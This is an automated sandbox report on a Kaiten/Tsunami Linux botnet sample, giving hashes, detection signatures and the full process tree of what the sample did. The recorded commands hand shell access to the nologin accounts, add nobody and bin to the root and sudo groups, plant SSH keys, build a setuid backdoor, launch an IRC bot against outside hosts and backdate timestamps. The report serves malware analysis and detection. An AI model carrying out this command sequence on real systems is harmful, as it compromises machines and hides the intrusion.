Analysis
-
max time kernel
146s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
-
submitted
28-08-2024 20:11
General
-
Target
go
-
Size
3KB
-
MD5
fd55f0754084ba041539bb469f06a83d
-
SHA1
af7beef3297d77bdf1299a4fbf6cc50e27113aa4
-
SHA256
9bde6ebc01e00f36cb71b979f602f61a0f78e201ad9073ae557d764578789023
-
SHA512
cee0d136026accde83034f0b135dac8bdc2eec1a395a518f4b15c813062d75d49432b6d0ba996448107c1735382e84c31aeec372e9e1a9f830f1be848f7a8248
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 3 IoCs
-
Detects Kaiten/Tsunami payload 2 IoCs
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
Adds new SSH keys 2 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
-
Modifies password files for system users/ groups 16 IoCs
Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.
-
Write file to user bin folder 1 TTPs 1 IoCs
-
Writes file to system bin folder 1 TTPs 64 IoCs
-
Changes its process name 2 IoCs
-
Reads runtime system information 18 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 36 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/go/tmp/go1⤵
- Adds new SSH keys
-
/usr/bin/gccgcc -o /usr/share/man/man1/kwk a.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu a.c -quiet -dumpbase a.c "-mtune=generic" "-march=x86-64" -auxbase a -fstack-protector-strong -Wformat -Wformat-security -o /tmp/cckk59hR.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas --64 -o /tmp/ccxJlL3s.o /tmp/cckk59hR.s3⤵
-
-
/usr/local/bin/asas --64 -o /tmp/ccxJlL3s.o /tmp/cckk59hR.s3⤵
-
-
/usr/sbin/asas --64 -o /tmp/ccxJlL3s.o /tmp/cckk59hR.s3⤵
-
-
/usr/bin/asas --64 -o /tmp/ccxJlL3s.o /tmp/cckk59hR.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/x86_64-linux-gnu/7/collect2/usr/lib/gcc/x86_64-linux-gnu/7/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc0cxbU4.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /usr/share/man/man1/kwk /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccxJlL3s.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc0cxbU4.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /usr/share/man/man1/kwk /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccxJlL3s.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o4⤵
-
-
-
-
/tmp/distro./distro2⤵
-
-
/bin/rmrm -rf /sbin/nologin2⤵
-
-
/bin/rmrm -rf /usr/sbin/nologin2⤵
-
-
/bin/rmrm -rf /bin/false2⤵
-
-
/bin/cpcp /bin/bash /bin/false2⤵
- Writes file to system bin folder
- Reads runtime system information
-
-
/bin/cpcp /bin/bash /usr/sbin/nologin2⤵
- Write file to user bin folder
- Reads runtime system information
-
-
/bin/cpcp /bin/bash /sbin/nologin2⤵
- Reads runtime system information
-
-
/usr/sbin/usermodusermod -G root nobody2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G root bin2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G sudo nobody2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G sudo bin2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/bin/rmrm -rf "/bin/.ssh/authorized*"2⤵
-
-
/bin/rmrm -rf "/usr/games/.ssh/authorized*"2⤵
-
-
/bin/mkdirmkdir /bin/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /usr/games/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /root/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /usr/games/.ssh -p2⤵
- Reads runtime system information
-
-
/usr/bin/whoamiwhoami2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/mkdirmkdir /root/.ssh -p2⤵
- Reads runtime system information
-
-
/usr/bin/whoamiwhoami2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/chmodchmod 600 /root/.ssh/authorized_keys2⤵
-
-
/bin/chmodchmod 755 /usr/games/.ssh2⤵
-
-
/bin/chmodchmod 600 /usr/games/.ssh/authorized_keys2⤵
-
-
/bin/chownchown games:games /usr/games/.ssh/2⤵
-
-
/bin/chownchown games:games /usr/games/.ssh/authorized_keys2⤵
-
-
/bin/chownchown bin:bin /usr/bin/.ssh/2⤵
-
-
/bin/chownchown bin:bin "/usr/bin/.ssh/au*"2⤵
-
-
/bin/rmrm -rf /bin/ping6 /sbin/ping62⤵
-
-
/usr/bin/gccgcc -o /bin/ping6 ping.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu ping.c -quiet -dumpbase ping.c "-mtune=generic" "-march=x86-64" -auxbase ping -fstack-protector-strong -Wformat -Wformat-security -o /tmp/ccKfsVfn.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas --64 -o /tmp/ccvMZD9Z.o /tmp/ccKfsVfn.s3⤵
-
-
/usr/local/bin/asas --64 -o /tmp/ccvMZD9Z.o /tmp/ccKfsVfn.s3⤵
-
-
/usr/sbin/asas --64 -o /tmp/ccvMZD9Z.o /tmp/ccKfsVfn.s3⤵
-
-
/usr/bin/asas --64 -o /tmp/ccvMZD9Z.o /tmp/ccKfsVfn.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/x86_64-linux-gnu/7/collect2/usr/lib/gcc/x86_64-linux-gnu/7/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cckGLn6C.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /bin/ping6 /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccvMZD9Z.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cckGLn6C.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /bin/ping6 /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccvMZD9Z.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o4⤵
-
-
-
-
/bin/chmodchmod u+xs /bin/ping62⤵
-
-
/bin/cpcp /bin/ping6 /sbin/uid2⤵
- Reads runtime system information
-
-
/bin/cpcp /bin/ping6 /usr/include/bakla.h2⤵
- Reads runtime system information
-
-
/usr/bin/gccgcc -DLINUX -Wall -o /bin/cls cls.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D LINUX cls.c -quiet -dumpbase cls.c "-mtune=generic" "-march=x86-64" -auxbase cls -Wall -fstack-protector-strong -Wformat-security -o /tmp/ccajPJSu.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas --64 -o /tmp/ccB22ei8.o /tmp/ccajPJSu.s3⤵
-
-
/usr/local/bin/asas --64 -o /tmp/ccB22ei8.o /tmp/ccajPJSu.s3⤵
-
-
/usr/sbin/asas --64 -o /tmp/ccB22ei8.o /tmp/ccajPJSu.s3⤵
-
-
/usr/bin/asas --64 -o /tmp/ccB22ei8.o /tmp/ccajPJSu.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/x86_64-linux-gnu/7/collect2/usr/lib/gcc/x86_64-linux-gnu/7/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccMLWrJL.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /bin/cls /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccB22ei8.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccMLWrJL.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /bin/cls /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccB22ei8.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o4⤵
-
-
-
-
/usr/bin/gccgcc clean.c -o /bin/clean -D Linux2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D Linux clean.c -quiet -dumpbase clean.c "-mtune=generic" "-march=x86-64" -auxbase clean -fstack-protector-strong -Wformat -Wformat-security -o /tmp/cch5QlXy.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas --64 -o /tmp/ccDPYlLc.o /tmp/cch5QlXy.s3⤵
-
-
/usr/local/bin/asas --64 -o /tmp/ccDPYlLc.o /tmp/cch5QlXy.s3⤵
-
-
/usr/sbin/asas --64 -o /tmp/ccDPYlLc.o /tmp/cch5QlXy.s3⤵
-
-
/usr/bin/asas --64 -o /tmp/ccDPYlLc.o /tmp/cch5QlXy.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/x86_64-linux-gnu/7/collect2/usr/lib/gcc/x86_64-linux-gnu/7/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccHrG1AQ.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /bin/clean /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccDPYlLc.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccHrG1AQ.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -dynamic-linker /lib64/ld-linux-x86-64.so.2 -pie -z now -z relro -o /bin/clean /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/Scrt1.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccDPYlLc.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o4⤵
-
-
-
-
/usr/bin/perlperl bot plm.ftp.sh 1080 -bash2⤵
- Changes its process name
-
-
/usr/bin/perlperl bot irc.undernet.org 6667 -bash2⤵
- Changes its process name
-
-
/usr/bin/touchtouch -d "Dec 1 2018" /root/.ssh /root/.ssh/authorized_keys /bin/bash /bin/brltty /bin/bunzip2 /bin/busybox /bin/bzcat /bin/bzcmp /bin/bzdiff /bin/bzegrep /bin/bzexe /bin/bzfgrep /bin/bzgrep /bin/bzip2 /bin/bzip2recover /bin/bzless /bin/bzmore /bin/cat /bin/chacl /bin/chgrp /bin/chmod /bin/chown /bin/chvt /bin/clean /bin/cls /bin/cp /bin/cpio /bin/dash /bin/date /bin/dd /bin/df /bin/dir /bin/dmesg /bin/dnsdomainname /bin/domainname /bin/dumpkeys /bin/echo /bin/ed /bin/efibootdump /bin/efibootmgr /bin/egrep /bin/false /bin/fgconsole /bin/fgrep /bin/findmnt /bin/fuser /bin/fusermount /bin/getfacl /bin/grep /bin/gunzip /bin/gzexe /bin/gzip /bin/hciconfig /bin/hostname /bin/ip /bin/journalctl /bin/kbd_mode /bin/kill /bin/kmod /bin/less /bin/lessecho /bin/lessfile /bin/lesskey /bin/lesspipe /bin/ln /bin/loadkeys /bin/login /bin/loginctl /bin/lowntfs-3g /bin/ls /bin/lsblk /bin/lsmod /bin/mkdir /bin/mknod /bin/mktemp /bin/more /bin/mount /bin/mountpoint /bin/mt /bin/mt-gnu /bin/mv /bin/nano /bin/nc /bin/nc.openbsd /bin/netcat /bin/networkctl /bin/nisdomainname /bin/ntfs-3g /bin/ntfs-3g.probe /bin/ntfscat /bin/ntfscluster /bin/ntfscmp /bin/ntfsfallocate /bin/ntfsfix /bin/ntfsinfo /bin/ntfsls /bin/ntfsmove /bin/ntfsrecover /bin/ntfssecaudit /bin/ntfstruncate /bin/ntfsusermap /bin/ntfswipe /bin/open /bin/openvt /bin/pidof /bin/ping /bin/ping4 /bin/ping6 /bin/plymouth /bin/ps /bin/pwd /bin/rbash /bin/readlink /bin/red /bin/rm /bin/rmdir /bin/rnano /bin/run-parts /bin/sed /bin/setfacl /bin/setfont /bin/setupcon /bin/sh /bin/sh.distrib /bin/sleep /bin/ss /bin/static-sh /bin/stty /bin/su /bin/sync /bin/systemctl /bin/systemd /bin/systemd-ask-password /bin/systemd-escape /bin/systemd-hwdb /bin/systemd-inhibit /bin/systemd-machine-id-setup /bin/systemd-notify /bin/systemd-sysusers /bin/systemd-tmpfiles /bin/systemd-tty-ask-password-agent /bin/tar /bin/tempfile /bin/touch /bin/true /bin/udevadm /bin/ulockmgr_server /bin/umount /bin/uname /bin/uncompress /bin/unicode_start /bin/vdir /bin/wdctl /bin/which /bin/whiptail /bin/ypdomainname /bin/zcat /bin/zcmp /bin/zdiff /bin/zegrep /bin/zfgrep /bin/zforce /bin/zgrep /bin/zless /bin/zmore /bin/znew /bin/.ssh/authorized_keys /bin /boot /dev /etc /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz /vmlinuz.old /sbin/acpi_available /sbin/agetty /sbin/alsa /sbin/apm_available /sbin/apparmor_parser /sbin/audispd /sbin/auditctl /sbin/auditd /sbin/augenrules /sbin/aureport /sbin/ausearch /sbin/autrace /sbin/badblocks /sbin/blkdeactivate /sbin/blkdiscard /sbin/blkid /sbin/blockdev /sbin/bridge /sbin/brltty /sbin/brltty-setup /sbin/capsh /sbin/cfdisk /sbin/cgdisk /sbin/chcpu /sbin/crda /sbin/ctrlaltdel /sbin/debugfs /sbin/depmod /sbin/devlink /sbin/dhclient /sbin/dhclient-script /sbin/dmsetup /sbin/dmstats /sbin/dosfsck /sbin/dosfslabel /sbin/dumpe2fs /sbin/e2fsck /sbin/e2image /sbin/e2label /sbin/e2undo /sbin/fatlabel /sbin/fdisk /sbin/findfs /sbin/fixfiles /sbin/fixparts /sbin/fsck /sbin/fsck.cramfs /sbin/fsck.ext2 /sbin/fsck.ext3 /sbin/fsck.ext4 /sbin/fsck.fat /sbin/fsck.minix /sbin/fsck.msdos /sbin/fsck.vfat /sbin/fsfreeze /sbin/fstab-decode /sbin/fstrim /sbin/gdisk /sbin/getcap /sbin/getpcaps /sbin/getty /sbin/halt /sbin/hdparm /sbin/hwclock /sbin/ifdown /sbin/ifquery /sbin/ifup /sbin/init /sbin/insmod /sbin/installkernel /sbin/ip /sbin/ip6tables /sbin/ip6tables-restore /sbin/ip6tables-save /sbin/iptables /sbin/iptables-restore /sbin/iptables-save /sbin/isosize /sbin/iw /sbin/iwconfig /sbin/iwevent /sbin/iwgetid /sbin/iwlist /sbin/iwpriv /sbin/iwspy /sbin/kbdrate /sbin/killall5 /sbin/ldconfig /sbin/ldconfig.real /sbin/load_policy /sbin/logsave /sbin/losetup /sbin/lsmod /sbin/lspcmcia /sbin/mkdosfs /sbin/mke2fs /sbin/mkfs /sbin/mkfs.bfs /sbin/mkfs.cramfs /sbin/mkfs.ext2 /sbin/mkfs.ext3 /sbin/mkfs.ext4 /sbin/mkfs.fat /sbin/mkfs.minix /sbin/mkfs.msdos /sbin/mkfs.ntfs /sbin/mkfs.vfat /sbin/mkhomedir_helper /sbin/mkntfs /sbin/mkswap /sbin/modinfo /sbin/modprobe /sbin/mount.fuse /sbin/mount.lowntfs-3g /sbin/mount.ntfs /sbin/mount.ntfs-3g /sbin/nologin /sbin/ntfsclone /sbin/ntfscp /sbin/ntfslabel /sbin/ntfsresize /sbin/ntfsundelete /sbin/on_ac_power /sbin/pam_extrausers_chkpwd /sbin/pam_extrausers_update /sbin/pam_tally /sbin/pam_tally2 /sbin/parted /sbin/partprobe /sbin/pccardctl /sbin/pivot_root /sbin/plymouthd /sbin/poweroff /sbin/raw /sbin/reboot /sbin/regdbdump /sbin/resize2fs /sbin/restorecon /sbin/restorecon_xattr /sbin/rmmod /sbin/rtacct /sbin/rtmon /sbin/runlevel /sbin/runuser /sbin/setcap /sbin/setfiles /sbin/setvtrgb /sbin/sfdisk /sbin/sgdisk /sbin/shadowconfig /sbin/shutdown /sbin/start-stop-daemon /sbin/sulogin /sbin/swaplabel /sbin/swapoff /sbin/swapon /sbin/switch_root /sbin/sysctl /sbin/tc /sbin/telinit /sbin/tipc /sbin/tune2fs /sbin/u-d-c-print-pci-ids /sbin/udevadm /sbin/uid /sbin/umount.udisks2 /sbin/unix_chkpwd /sbin/unix_update /sbin/ureadahead /sbin/wipefs /sbin/wpa_action /sbin/wpa_cli /sbin/wpa_supplicant /sbin/xtables-multi /sbin/zramctl2⤵
- Adds new SSH keys
- Writes file to system bin folder
-
-
/bin/rmrm -rf a.c ".reboot*" a.c clean.c cls.c ping.c "scan*" distro go "go.tgz*" cls.c clean.c bot ping.c go "gs*"2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
381B
MD5fada28f9405c20320d0169f7549137da
SHA153f934539664a6e2c0ef06317b8518385e1272aa
SHA256e962c1d303f7d1b24325d7e8165e7b3c157455c07d666af1a5bfce4e6bcb8640
SHA512caf57f3fef4eccef88a83c74ec9b53ffffe52bfc6ba809957991beedebf581f427994a59bdec5cb9e5c9b361e6c646501f952d7941acc4ef90721f7bc6399784
-
Filesize
27KB
MD540c5882e66b86c06d2beb88300622584
SHA1352be2965f2d0f2383e8beed402984a1ca1e97f8
SHA25658af2ca68d9ddc53475e465b100138723e7d06201aab3d95a3de6e59379654b9
SHA512328c464dede1f6ef8be9cec013ecc1fe779c80ab1f105f1bef49994c11743ec815a185006960e38eb3b1f383d727b1928ab55c15d9d75d961fdf2587df158e2f
-
Filesize
25KB
MD5294a26b5d2f08ca41f91db35a75fbf27
SHA1a93196d3461a86d15d2fd62df1ea558a9f9f3ccc
SHA25667825cc66c6b5848b4211b3eaf03dd3d9dd949495d601143527fe36c5d30da45
SHA512eace54d1e5ac7ee92c6e20d484c6061d1eebc6cbcbae14be5ed76cf7f84702e701a0189c8a9eb2f5f68d50e1dad206129bffa992b19b13a73b61d9600d98857e
-
Filesize
1.1MB
MD5d5d689ba6020abe746c52ae7438d9eb2
SHA10a4ece3b3c332c39922b8d521c8f2087e9cf22b6
SHA25615d4469eb3da716fefcc0c395a5b1d1657ad0555ec3ae623e727bb0dfcee19cf
